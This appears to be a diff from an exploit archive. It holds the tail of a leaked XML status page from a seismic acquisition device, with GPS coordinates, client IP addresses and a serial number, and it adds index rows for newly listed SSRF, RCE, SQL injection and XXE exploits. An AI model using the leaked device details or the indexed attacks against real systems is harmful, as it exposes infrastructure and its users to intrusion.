+<reading status='100' display-primary='true' path='num_text_in'
+    title='Total number of text samples in'>0</reading>
+<reading status='100' display-primary='true' path='last5_text_in'
+    title='Number of text samples in last 5 minutes'>0</reading>
+<reading status='100' display-primary='true' path='num_ms_rec_out'
+    title='Total number of Miniseed records out'>22682743</reading>
+<reading status='100' display-primary='true' path='last5_ms_rec_out'
+    title='Number of Miniseed records out in last 5 minutes'>655</reading>
+</module>
+<module status='-1' display-primary='true' path='gps' title='GPS'>
+<reading status='100' display-primary='true' path='have_data'
+    title='GPS data received'>true</reading>
+<reading status='100' display-primary='false' path='last_data'
+    title='Last data received from GPS'>2022-06-14T11:26:53Z</reading>
+<reading status='100' display-primary='true' path='fix'
+    title='Fix'>3D</reading>
+<reading status='100' display-primary='true' path='last_fix'
+    title='Timestamp of last fix'>2022-06-14T11:26:53Z</reading>
+<reading status='-1' display-primary='true' path='latitude' units='°'
+    title='Latitude'>13.909917</reading>
+<reading status='-1' display-primary='true' path='longitude' units='°'
+    title='Longitude'>100.593734</reading>
+<reading status='-1' display-primary='true' path='elevation' units='m'
+    title='Elevation'>3</reading>
+<reading status='100' display-primary='true' path='sv_count'
+    title='Count of satellites in view'>26</reading>
+<reading status='100' display-primary='true' path='sv_used'
+    title='Count of satellites used in fix'>12</reading>
+<reading status='-1' display-primary='true' path='sv_online'
+    title='Timestamp of last nmea sentence'>2022-06-14T11:26:52Z</reading>
+<reading status='100' display-primary='true' path='rs232_detect'
+    title='RS232 device detect'>true</reading>
+</module>
+<module status='-1' display-primary='true' path='ntp' title='NTP'>
+<reading status='-1' display-primary='false' path='mode'
+    title='Timing mode'>direct_gps</reading>
+<reading status='-1' display-primary='true' path='mode_desc'
+    title='Timing mode'>NTP is using a GPS reference source.</reading>
+<reading status='100' display-primary='true' path='locked'
+    title='Clock locked'>true</reading>
+<reading status='100' display-primary='true' path='estimated_error' units='s'
+    title='Estimated error'>0.000131</reading>
+<reading status='-1' display-primary='true' path='clock_source'
+    title='Clock source'>GPS</reading>
+<reading status='-1' display-primary='false' path='peer'
+    title='Peer'>127.127.28.1</reading>
+<reading status='-1' display-primary='false' path='peer_refid'
+    title='Peer&apos;s reference ID'>GPS</reading>
+</module>
+<module status='-1' display-primary='true' path='seedlink-out.0' title='SEEDlink network server (instance 1)'>
+<reading status='-1' display-primary='true' path='num_records'
+    title='Total number of records seen'>22682743</reading>
+<reading status='100' display-primary='true' path='last5_records'
+    title='Number of records seen in last 5 minutes'>655</reading>
+<reading status='-1' display-primary='true' path='seq'
+    title='Current sequence number'>3382931</reading>
+<reading status='100' display-primary='true' path='num_clients'
+    title='Number of clients connected'>7</reading>
+<list status='-1' display-primary='true' path='clients' title='Clients'>
+<list-item status='-1' display-primary='true' path='2DF96A1C' title='Client #1700'>
+<reading status='-1' display-primary='true' path='remote_ip'
+    title='Remote IP address'>123.160.221.22</reading>
+<reading status='-1' display-primary='true' path='remote_port'
+    title='Remote TCP port'>21100</reading>
+<reading status='-1' display-primary='true' path='dialup'
+    title='Dialup mode'>false</reading>
+<reading status='-1' display-primary='true' path='seqno'
+    title='Last sequence no'>0</reading>
+</list-item>
+<list-item status='-1' display-primary='true' path='79C29121' title='Client #3412'>
+<reading status='-1' display-primary='true' path='remote_ip'
+    title='Remote IP address'>113.53.234.98</reading>
+<reading status='-1' display-primary='true' path='remote_port'
+    title='Remote TCP port'>33964</reading>
+<reading status='-1' display-primary='true' path='dialup'
+    title='Dialup mode'>false</reading>
+<reading status='-1' display-primary='true' path='seqno'
+    title='Last sequence no'>0</reading>
+</list-item>
+<list-item status='-1' display-primary='true' path='5060E6FF' title='Client #3581'>
+<reading status='-1' display-primary='true' path='remote_ip'
+    title='Remote IP address'>203.114.125.67</reading>
+<reading status='-1' display-primary='true' path='remote_port'
+    title='Remote TCP port'>48666</reading>
+<reading status='-1' display-primary='true' path='dialup'
+    title='Dialup mode'>false</reading>
+<reading status='-1' display-primary='true' path='seqno'
+    title='Last sequence no'>3221351</reading>
+</list-item>
+<list-item status='-1' display-primary='true' path='B1A1AB18' title='Client #3723'>
+<reading status='-1' display-primary='true' path='remote_ip'
+    title='Remote IP address'>113.53.234.98</reading>
+<reading status='-1' display-primary='true' path='remote_port'
+    title='Remote TCP port'>45158</reading>
+<reading status='-1' display-primary='true' path='dialup'
+    title='Dialup mode'>false</reading>
+<reading status='-1' display-primary='true' path='seqno'
+    title='Last sequence no'>3382931</reading>
+</list-item>
+<list-item status='-1' display-primary='true' path=' 91FC71C' title='Client #3720'>
+<reading status='-1' display-primary='true' path='remote_ip'
+    title='Remote IP address'>221.128.101.50</reading>
+<reading status='-1' display-primary='true' path='remote_port'
+    title='Remote TCP port'>55776</reading>
+<reading status='-1' display-primary='true' path='dialup'
+    title='Dialup mode'>false</reading>
+<reading status='-1' display-primary='true' path='seqno'
+    title='Last sequence no'>3382931</reading>
+</list-item>
+<list-item status='-1' display-primary='true' path='599CD113' title='Client #3721'>
+<reading status='-1' display-primary='true' path='remote_ip'
+    title='Remote IP address'>118.175.2.50</reading>
+<reading status='-1' display-primary='true' path='remote_port'
+    title='Remote TCP port'>60818</reading>
+<reading status='-1' display-primary='true' path='dialup'
+    title='Dialup mode'>false</reading>
+<reading status='-1' display-primary='true' path='seqno'
+    title='Last sequence no'>3382931</reading>
+</list-item>
+<list-item status='-1' display-primary='true' path='BAB80847' title='Client #3722'>
+<reading status='-1' display-primary='true' path='remote_ip'
+    title='Remote IP address'>203.114.125.67</reading>
+<reading status='-1' display-primary='true' path='remote_port'
+    title='Remote TCP port'>53984</reading>
+<reading status='-1' display-primary='true' path='dialup'
+    title='Dialup mode'>false</reading>
+<reading status='-1' display-primary='true' path='seqno'
+    title='Last sequence no'>3382931</reading>
+</list-item>
+</list>
+</module>
+<module status='-1' display-primary='true' path='storage' title='Storage'>
+<reading status='100' display-primary='true' path='state'
+    title='State'>Inactive</reading>
+<reading status='100' display-primary='true' path='recording_state'
+    title='Recording state'>Last flush good</reading>
+<reading status='-1' display-primary='true' path='last_accessed'
+    title='Last accessed'>2022-06-14T08:10:14Z</reading>
+<reading status='-1' display-primary='true' path='free_space_pct'
+    title='Free space'>27.2%</reading>
+<reading status='-1' display-primary='false' path='free_space' units='bytes'
+    title='Available space'>17449811968</reading>
+<reading status='-1' display-primary='true' path='size' units='bytes'
+    title='Storage size'>64134021120</reading>
+<reading status='100' display-primary='false' path='fs_type'
+    title='Filesystem type'>VFAT</reading>
+<list status='-1' display-primary='false' path='clients' title='Clients'>
+</list>
+</module>
+<module status='-1' display-primary='true' path='system' title='Linux system'>
+<reading status='-1' display-primary='false' path='serial_number'
+    title='Serial number'>DAS-405D62</reading>
+<reading status='-1' display-primary='true' path='uptime' units='s'
+    title='System uptime'>10307538</reading>
+<reading status='-1' display-primary='true' path='load_average'
+    title='Load Average'>1.72</reading>
+<reading status='100' display-primary='true' path='root_free_space' units='bytes'
+    title='Root filesystem free space'>437809152</reading>
+<reading status='100' display-primary='true' path='root_percent_free_space'
+    title='Root filesystem percentage space free'>77.0%</reading>
+<reading status='-1' display-primary='true' path='build_label'
+    title='Software repository label'>&example;</reading>
+<reading status='-1' display-primary='true' path='build_version'
+    title='Software build number'>15809</reading>
+<reading status='-1' display-primary='true' path='build_machine'
+    title='Build machine'>CMG-DAS</reading>
+<reading status='-1' display-primary='true' path='last_reboot_1'
+    title='Reboot 1'>2021-04-08T05:06:17Z</reading>
+<reading status='-1' display-primary='true' path='last_reboot_2'
+    title='Reboot 2'>2021-04-08T07:02:50Z</reading>
+<reading status='-1' display-primary='true' path='last_reboot_3'
+    title='Reboot 3'>2021-04-08T08:00:33Z</reading>
+<reading status='-1' display-primary='true' path='last_reboot_4'
+    title='Reboot 4'>2021-04-08T08:30:41Z</reading>
+<reading status='-1' display-primary='true' path='last_reboot_5'
+    title='Reboot 5'>2021-04-08T08:39:15Z</reading>
+<reading status='-1' display-primary='true' path='last_reboot_6'
+    title='Reboot 6'>2021-04-08T08:46:24Z</reading>
+<reading status='-1' display-primary='true' path='last_reboot_7'
+    title='Reboot 7'>2021-04-08T10:08:51Z</reading>
+<reading status='-1' display-primary='true' path='last_reboot_8'
+    title='Reboot 8'>2021-04-09T07:10:41Z</reading>
+<reading status='-1' display-primary='true' path='last_reboot_9'
+    title='Reboot 9'>2021-10-07T06:48:35Z</reading>
+<reading status='-1' display-primary='true' path='last_reboot_10'
+    title='Reboot 10'>2022-02-15T04:14:30Z</reading>
+<reading status='100' display-primary='true' path='temperature' units='°C'
+    title='System temperature'>43.875</reading>
+<reading status='100' display-primary='true' path='voltage' units='V'
+    title='Power supply voltage'>12.75</reading>
+<reading status='100' display-primary='true' path='current' units='A'
+    title='Power supply current'>0.442</reading>
+<reading status='100' display-primary='true' path='sensor_A_voltage' units='V'
+    title='Sensor A voltage'>12.675</reading>
+<reading status='100' display-primary='true' path='sensor_A_current' units='A'
+    title='Sensor A current'>0.289</reading>
+<reading status='100' display-primary='true' path='sensor_B_voltage' units='V'
+    title='Sensor B voltage'>12.725</reading>
+<reading status='100' display-primary='true' path='sensor_B_current' units='A'
+    title='Sensor B current'>0.002</reading>
+</module>
+</xml-status>
+
+```

files_exploits.csv

@@ -1765,6 +1765,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 1399,exploits/asp/webapps/1399.txt,"WebWiz Products 1.0/3.06 - Authentication Bypass / SQL Injection",2005-12-30,DevilBox,webapps,asp,,2005-12-29,2017-11-01,1,,,,,,
 39231,exploits/asp/webapps/39231.py,"WhatsUp Gold 16.3 - Remote Code Execution",2016-01-13,"Matt Buzanowski",webapps,asp,,2016-01-13,2016-01-13,0,CVE-2015-8261;OSVDB-132657,,,,,
 8596,exploits/asp/webapps/8596.pl,"Winn ASP Guestbook 1.01b - Remote Database Disclosure",2009-05-04,ZoRLu,webapps,asp,,2009-05-03,,1,OSVDB-63338;CVE-2009-4760,,,,,
+51039,exploits/asp/webapps/51039.txt,"wkhtmltopdf 0.12.6 -  Server Side Request Forgery",2023-03-23,"Momen Eldawakhly",webapps,asp,,2023-03-23,2023-03-23,0,CVE-2022-35583,,,,,
 25790,exploits/asp/webapps/25790.txt,"WWWeb Concepts Events System 1.0 - 'login.asp' SQL Injection",2005-06-06,Romty,webapps,asp,,2005-06-06,2013-05-29,1,,,,,,https://www.securityfocus.com/bid/13859/info
 3032,exploits/asp/webapps/3032.txt,"wywo inout board 1.0 - Multiple Vulnerabilities",2006-12-28,ajann,webapps,asp,,2006-12-27,,1,OSVDB-32511;CVE-2006-6846;OSVDB-32510;OSVDB-32509,,,,,
 3469,exploits/asp/webapps/3469.txt,"X-ice News System 1.0 - 'devami.asp?id' SQL Injection",2007-03-13,CyberGhost,webapps,asp,,2007-03-12,2016-09-27,1,OSVDB-34040;CVE-2007-1570;CVE-2007-1438,,,,http://www.exploit-db.comxice_haberv1.zip,
@@ -5107,6 +5108,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 31691,exploits/ios/webapps/31691.txt,"Office Assistant Pro 2.2.2 iOS - Local File Inclusion",2014-02-16,Vulnerability-Lab,webapps,ios,8080,2014-02-16,2014-02-16,0,OSVDB-103413,,,,,https://www.vulnerability-lab.com/get_content.php?id=1197
 26890,exploits/ios/webapps/26890.txt,"Olive File Manager 1.0.1 iOS - Multiple Vulnerabilities",2013-07-16,Vulnerability-Lab,webapps,ios,,2013-07-16,2013-07-16,0,OSVDB-95772;OSVDB-95771,,,,,https://www.vulnerability-lab.com/get_content.php?id=1009
 28976,exploits/ios/webapps/28976.txt,"OliveOffice Mobile Suite 2.0.3 iOS - Local File Inclusion",2013-10-15,Vulnerability-Lab,webapps,ios,,2013-10-15,2013-10-15,0,,,,,,https://www.vulnerability-lab.com/get_content.php?id=1110
+51036,exploits/ios/webapps/51036.txt,"Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities",2023-03-23,"Chokri Hammedi",webapps,ios,,2023-03-23,2023-03-23,0,,,,,,
 34957,exploits/ios/webapps/34957.txt,"PayPal Inc BB #85 MB iOS 4.6 - Authentication Bypass",2014-10-14,Vulnerability-Lab,webapps,ios,,2014-10-14,2014-10-14,0,,,,,,https://www.vulnerability-lab.com/get_content.php?id=895
 32866,exploits/ios/webapps/32866.txt,"PDF Album 1.7 iOS - Local File Inclusion",2014-04-14,Vulnerability-Lab,webapps,ios,,2014-04-14,2014-04-14,0,OSVDB-105787,,,,,https://www.vulnerability-lab.com/get_content.php?id=1255
 36924,exploits/ios/webapps/36924.txt,"PDF Converter & Editor 2.1 iOS - Local File Inclusion",2015-05-06,Vulnerability-Lab,webapps,ios,,2015-05-08,2015-05-08,0,OSVDB-121802,,,,,https://www.vulnerability-lab.com/get_content.php?id=1480
@@ -33371,6 +33373,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 25014,exploits/php/webapps/25014.txt,"WorkBoard 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2004-12-17,Lostmon,webapps,php,,2004-12-17,2013-04-25,1,OSVDB-12504,,,,,https://www.securityfocus.com/bid/12009/info
 23753,exploits/php/webapps/23753.txt,"Working Resources BadBlue Server 2.40 - 'PHPtest.php' Full Path Disclosure",2004-02-24,"Rafel Ivgi",webapps,php,,2004-02-24,2012-12-30,1,CVE-2004-2374;OSVDB-4063,,,,,https://www.securityfocus.com/bid/9737/info
 4653,exploits/php/webapps/4653.txt,"WorkingOnWeb 2.0.1400 - 'events.php' SQL Injection",2007-11-24,ka0x,webapps,php,,2007-11-23,,1,OSVDB-39278;CVE-2007-6128,,,,,
+51038,exploits/php/webapps/51038.txt,"WorkOrder CMS 0.1.0 - SQL Injection",2023-03-23,"Chokri Hammedi",webapps,php,,2023-03-23,2023-03-23,0,,,,,,
 7481,exploits/php/webapps/7481.txt,"WorkSimple 1.2.1 - Remote File Inclusion / Sensitive Data Disclosure",2008-12-15,Osirys,webapps,php,,2008-12-14,,1,OSVDB-50726;CVE-2008-5765;OSVDB-50725;CVE-2008-5764,,,,,
 11550,exploits/php/webapps/11550.txt,"WorkSimple 1.3.2 - Multiple Vulnerabilities",2010-02-23,JIKO,webapps,php,,2010-02-22,2017-01-05,1,,,,,,
 47045,exploits/php/webapps/47045.txt,"WorkSuite PRM 2.4 - 'password' SQL Injection",2019-07-01,"Mehmet EMIROGLU",webapps,php,80,2019-07-01,2019-07-03,0,,"SQL Injection (SQLi)",,,,
@@ -34121,6 +34124,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48886,exploits/python/webapps/48886.txt,"aaPanel 6.6.6 - Privilege Escalation & Remote Code Execution (Authenticated)",2020-10-16,"Ünsal Furkan Harani",webapps,python,,2020-10-16,2020-10-16,0,,,,,,
 47497,exploits/python/webapps/47497.py,"Ajenti 2.1.31 - Remote Code Execution",2019-10-14,"Jeremy Brown",webapps,python,,2019-10-14,2019-10-14,0,,,,,,
 48929,exploits/python/webapps/48929.py,"Ajenti 2.1.36 - Remote Code Execution (Authenticated)",2020-10-23,"Ahmet Ümit BAYRAM",webapps,python,,2020-10-23,2020-10-23,0,,,,,,
+51040,exploits/python/webapps/51040.txt,"Bitbucket v7.0.0 -  RCE",2023-03-23,khal4n1,webapps,python,,2023-03-23,2023-03-23,0,CVE-2022-36804,,,,,
 43021,exploits/python/webapps/43021.py,"Check_MK 1.2.8p25 - Information Disclosure",2017-10-18,"Julien Ahrens",webapps,python,,2017-10-20,2017-10-20,0,CVE-2017-14955,,,,http://www.exploit-db.comcheck-mk-enterprise-1.2.8p25.demo_0.stretch_amd64.deb,
 51030,exploits/python/webapps/51030.txt,"CVAT 2.0 - Server Side Request Forgery",2022-11-11,"Emir Polat",webapps,python,,2022-11-11,2022-11-18,0,CVE-2022-31188,,,,,
 47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,,2020-01-06,2020-04-13,1,CVE-2019-19844,,,,,https://ryu22e.org/en/posts/2019/12/25/django-cve-2019-19844/
@@ -45542,6 +45546,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44430,exploits/xml/webapps/44430.txt,"KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection",2018-04-09,LiquidWorm,webapps,xml,,2018-04-09,2018-05-21,0,,,,,,
 43113,exploits/xml/webapps/43113.txt,"Ladon Framework for Python 0.9.40 - XML External Entity Expansion",2017-11-03,"RedTeam Pentesting",webapps,xml,,2017-11-03,2017-11-03,0,,"XML External Entity (XXE)",,,http://www.exploit-db.comladon-0.9.40.tar.gz,https://www.redteam-pentesting.de/advisories/rt-sa-2016-008
 37977,exploits/xml/webapps/37977.py,"Magento eCommerce - Remote Code Execution",2015-08-26,"Manish Tanwar",webapps,xml,,2015-08-26,2015-08-26,0,CVE-2015-1397;OSVDB-121260,,,,,
+51037,exploits/xml/webapps/51037.txt,"MAN-EAM-0003 V3.2.4 - XXE",2023-03-23,"Ahmed Alroky",webapps,xml,,2023-03-23,2023-03-23,0,CVE-2022-38840,,,,,
 45337,exploits/xml/webapps/45337.txt,"NovaRad NovaPACS Diagnostics Viewer 8.5 - XML External Entity Injection (File Disclosure)",2018-09-06,LiquidWorm,webapps,xml,,2018-09-06,2018-09-06,0,,"XML External Entity (XXE)",,,,
 38897,exploits/xml/webapps/38897.txt,"OpenMRS 2.3 (1.11.4) - Expression Language Injection",2015-12-08,LiquidWorm,webapps,xml,,2015-12-08,2015-12-08,0,OSVDB-131537,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5288.php
 38899,exploits/xml/webapps/38899.txt,"OpenMRS 2.3 (1.11.4) - Local File Disclosure",2015-12-08,LiquidWorm,webapps,xml,,2015-12-08,2015-12-08,0,OSVDB-131535,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5286.php